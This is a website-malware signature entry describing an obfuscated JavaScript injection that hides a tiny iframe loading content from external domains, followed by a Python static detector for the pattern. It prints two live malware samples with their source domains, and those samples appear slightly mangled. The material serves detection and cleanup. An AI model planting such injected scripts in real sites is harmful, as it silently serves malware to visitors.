SiteCheck Signatures

malware-entry-mwiframehd21

Description: Encoded JavaScript that hides an iframe loading
http://img102.imageshacks.net/img102/4681/head.jpeg, or a URL on one of a few other domains.

The hidden iframe loads malware from external websites without being visible to the user.

Affecting: vBulletin and WordPress sites.

Clean up: This malware is generally hidden inside the template footer or header.

Malware dump (sample of malware):


<script>var _0x38745= ["x77x72x69x74x65"]; var ccBca=document; var aaacB = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg102.imageshacks.net%2Fimg102%2F4681%2Fhead.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var acBaa = aaacB.replace(/XLMS9Q21/g,"s"); var acBac = acBaa.replace(/LSM21ghk8/g,"o"); var BaaBa = acBac.replace(/JQ21KL#AZ/g,"e");ccBca_0x38745[0];</script>


<script>var _0x110261= ["x77x72x69x74x65"]; var aBBcB=document; var ccccc = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg121.imagehacks.info%2Fimg121%2F103%2Fheader.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var BBBcB = ccccc.replace(/XLMS9Q21/g,"s"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,"o"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,"e");aBBcB_0x110261[0];</script>
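
A static check for this pattern, added here as an example (it is not SiteCheck's own signature code): it reads each script as text without executing it, applies the script's own `.replace(/TOKEN/g, "x")` substitutions to its string literal, URL-decodes the result and reports any iframe with a width or height of 0 or 1. The function names, the size threshold and the `example.invalid` host in the constructed sample are assumptions.

```python
import re
import sys
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
LITERAL_RE = re.compile(r"var\s+\w+\s*=\s*'([^']*)'")
REPLACE_RE = re.compile(r"""\.replace\(\s*/((?:[^/\\]|\\.)+)/g\s*,\s*(["'])(.*?)\2\s*\)""")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')
TINY = {"0", "1"}  # assumed threshold for an "invisible" frame

# Constructed sample modelled on the dump above; example.invalid is a placeholder host.
SAMPLE = (
    "<script>var d=document; var a = '<iframJQ21KL#AZ XLMS9Q21rc="
    '"http%3A%2F%2Fexample.invalid%2Fimg%2Fhead.jpeg" width="1" '
    'hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>\'; '
    'var b = a.replace(/XLMS9Q21/g,"s"); var c = b.replace(/LSM21ghk8/g,"o"); '
    'var e = c.replace(/JQ21KL#AZ/g,"e");</script>'
)

def deobfuscate(script_body):
    """Undo the token substitution and URL-encoding of each single-quoted literal."""
    pairs = [(m.group(1), m.group(3)) for m in REPLACE_RE.finditer(script_body)]
    decoded = []
    for literal in LITERAL_RE.findall(script_body):
        for token, char in pairs:
            literal = literal.replace(token, char)  # token handled as plain text
        decoded.append(unquote(literal))
    return decoded

def find_hidden_iframes(html):
    """Return the src of every 0/1-pixel iframe that a script would write."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        for text in deobfuscate(body):
            for tag in IFRAME_RE.findall(text):
                attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
                if attrs.get("width") in TINY or attrs.get("height") in TINY:
                    findings.append(attrs.get("src", ""))
    return findings

if __name__ == "__main__":
    for path in sys.argv[1:]:  # e.g. theme header and footer template files
        with open(path, encoding="utf-8", errors="replace") as fh:
            for src in find_hidden_iframes(fh.read()):
                print(f"{path}: hidden iframe -> {src}")
```

Run it with the header and footer template files as arguments; a hit means the script block in that file should be removed.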